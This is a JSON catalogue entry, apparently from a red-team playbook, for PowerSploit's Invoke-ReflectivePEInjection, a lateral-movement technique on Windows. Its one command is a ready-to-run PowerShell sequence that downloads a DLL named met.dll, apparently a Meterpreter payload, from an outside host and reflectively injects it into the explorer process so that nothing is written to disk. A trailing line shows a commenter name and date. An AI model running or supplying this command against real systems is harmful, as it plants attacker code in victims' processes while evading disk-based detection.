{
"name": "Invoke-ReflectivePEInjection",
"phases": [
"07. Lateral Movement"
],
"category": "",
"stealthy": false,
"platforms": [
"Windows"
],
"source": "https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1",
"description": "The script performs reflection to avoid writing assemblies to disk, after which it parses the\ndesired PE file. It has two separate modes, the first is to reflectively load a DLL or EXE into the\nsame process, and the second is to load a DLL into a remote process.",
"undetected": [],
"detected": [],
"commands": [
{
"id": "051d902d-8712-40db-8e3c-756f07d216f3",
"name": "Download and inject DLL into memory",
"description": "Note that the public version of this script fails on versions of Windows 10 1803 or newer due to the multiple instances of GetProcAddress in UnsafeNativeMethods.",
"tag": "",
"results": [],
"cmd": "$bytes = (New-Object\nSystem.Net.WebClient).DownloadData('http://192.168.10.10/met.dll')\n$procid = (Get-Process -Name explorer).Id\nImport-Module C:\\Tools\\Invoke-ReflectivePEInjection.ps1\nInvoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid"
}
],
"content": "",
"references": [],
"language": ""
}
Patrick-DE
commented
11 months ago